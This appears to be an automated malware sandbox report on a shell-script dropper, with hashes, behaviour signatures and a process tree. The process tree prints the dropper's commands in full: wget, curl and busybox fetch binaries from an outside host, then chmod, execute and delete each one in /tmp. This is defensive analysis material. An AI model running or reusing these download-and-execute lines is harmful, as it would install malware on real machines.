Analysis
max time kernel: 150s
max time network: 56s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 21/11/2024, 05:03
Static task: static1
Behavioral task: behavioral1
  Sample: 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
  Sample: 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
  Resource: debian9-mipsbe-20240418-en
Behavioral task: behavioral4
  Sample: 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
  Resource: debian9-mipsel-20240611-en
General
Target: 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
Size: 10KB
MD5: 949d488100620ea8b120daff8dc03bcb
SHA1: 0c754e9fb78db8e7a75b06863994e13cf648e996
SHA256: 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649
SHA512: 116e81b69f685ba3702900725834b72fa78dfec497124e7200dea051854c71a6ffa3818723b1c0d62b192bbc945ae89bffc4756ff3197c81b4c2f2f409aab453
SSDEEP: 192:P07/zgIn65Qy7nDoEv5e6qUp9gPnnp9gPnN/LgIn65Q0nDo8e6c:P07rgIn6uy5vIUp9gPnnp9gPnNjgIn60
Malware Config
Signatures

File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
888  chmod
747  chmod
783  chmod
813  chmod
867  chmod
881  chmod
895  chmod
740  chmod
754  chmod
823  chmod
845  chmod
874  chmod

Executes dropped EXE 12 IoCs
ioc                                       pid  Process
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM   741  uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE   748  Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ   756  eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik   785  6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq   814  WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN   824  bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc   846  yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc
/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX   868  SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX
/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5   875  ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5
/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm   882  ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f   889  zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f
/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD   896  nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD
Reads runtime system information 13 IoCs
description               ioc                             Process
File opened for reading   /proc/sys/crypto/fips_enabled   curl   (13 occurrences, one per curl process)
System Network Configuration Discovery 1 TTPs 38 IoCs
Adversaries may gather information about the network configuration of a system.
Process   pids
wget      715, 743, 750, 760, 790, 816, 826, 851, 870, 877, 884, 891, 898
busybox   738, 746, 753, 776, 811, 822, 838, 866, 873, 880, 887, 894
curl      732, 744, 751, 766, 797, 817, 827, 862, 871, 878, 885, 892, 899

Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description                    ioc                                       Process
File opened for modification   /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE   curl
File opened for modification   /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq   curl
File opened for modification   /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN   curl
File opened for modification   /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc   curl
File opened for modification   /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5   curl
File opened for modification   /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f   curl
File opened for modification   /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM   curl
File opened for modification   /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ   curl
File opened for modification   /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik   curl
File opened for modification   /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX   curl
File opened for modification   /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm   curl
File opened for modification   /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD   curl
Processes (indentation shows nesting depth; each entry is image path: command line, followed by its PID and matched signatures)

/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh: /tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh  PID:708
  /bin/rm: /bin/rm bins.sh  PID:712
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM  PID:715
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM  PID:732
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM  PID:738
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM  PID:740
    - File and Directory Permissions Modification
  /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM: ./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM  PID:741
    - Executes dropped EXE
  /bin/rm: rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM  PID:742
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE  PID:743
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE  PID:744
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE  PID:746
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE  PID:747
    - File and Directory Permissions Modification
  /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE: ./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE  PID:748
    - Executes dropped EXE
  /bin/rm: rm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE  PID:749
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ  PID:750
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ  PID:751
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ  PID:753
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ  PID:754
    - File and Directory Permissions Modification
  /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ: ./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ  PID:756
    - Executes dropped EXE
  /bin/rm: rm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ  PID:759
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik  PID:760
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik  PID:766
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik  PID:776
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik  PID:783
    - File and Directory Permissions Modification
  /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik: ./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik  PID:785
    - Executes dropped EXE
  /bin/rm: rm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik  PID:788
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq  PID:790
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq  PID:797
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq  PID:811
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq  PID:813
    - File and Directory Permissions Modification
  /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq: ./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq  PID:814
    - Executes dropped EXE
  /bin/rm: rm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq  PID:815
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN  PID:816
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN  PID:817
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN  PID:822
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN  PID:823
    - File and Directory Permissions Modification
  /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN: ./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN  PID:824
    - Executes dropped EXE
  /bin/rm: rm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN  PID:825
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc  PID:826
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc  PID:827
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc  PID:838
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc  PID:845
    - File and Directory Permissions Modification
  /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc: ./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc  PID:846
    - Executes dropped EXE
  /bin/rm: rm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc  PID:849
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX  PID:851
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX  PID:862
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX  PID:866
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX  PID:867
    - File and Directory Permissions Modification
  /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX: ./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX  PID:868
    - Executes dropped EXE
  /bin/rm: rm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX  PID:869
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5  PID:870
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5  PID:871
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5  PID:873
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5  PID:874
    - File and Directory Permissions Modification
  /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5: ./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5  PID:875
    - Executes dropped EXE
  /bin/rm: rm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5  PID:876
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm  PID:877
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm  PID:878
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm  PID:880
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm  PID:881
    - File and Directory Permissions Modification
  /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm: ./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm  PID:882
    - Executes dropped EXE
  /bin/rm: rm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm  PID:883
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f  PID:884
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f  PID:885
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f  PID:887
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f  PID:888
    - File and Directory Permissions Modification
  /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f: ./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f  PID:889
    - Executes dropped EXE
  /bin/rm: rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f  PID:890
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD  PID:891
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD  PID:892
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD  PID:894
    - System Network Configuration Discovery
  /bin/chmod: chmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD  PID:895
    - File and Directory Permissions Modification
  /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD: ./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD  PID:896
    - Executes dropped EXE
  /bin/rm: rm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD  PID:897
  /usr/bin/wget: wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y  PID:898
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y  PID:899
    - Reads runtime system information
    - System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97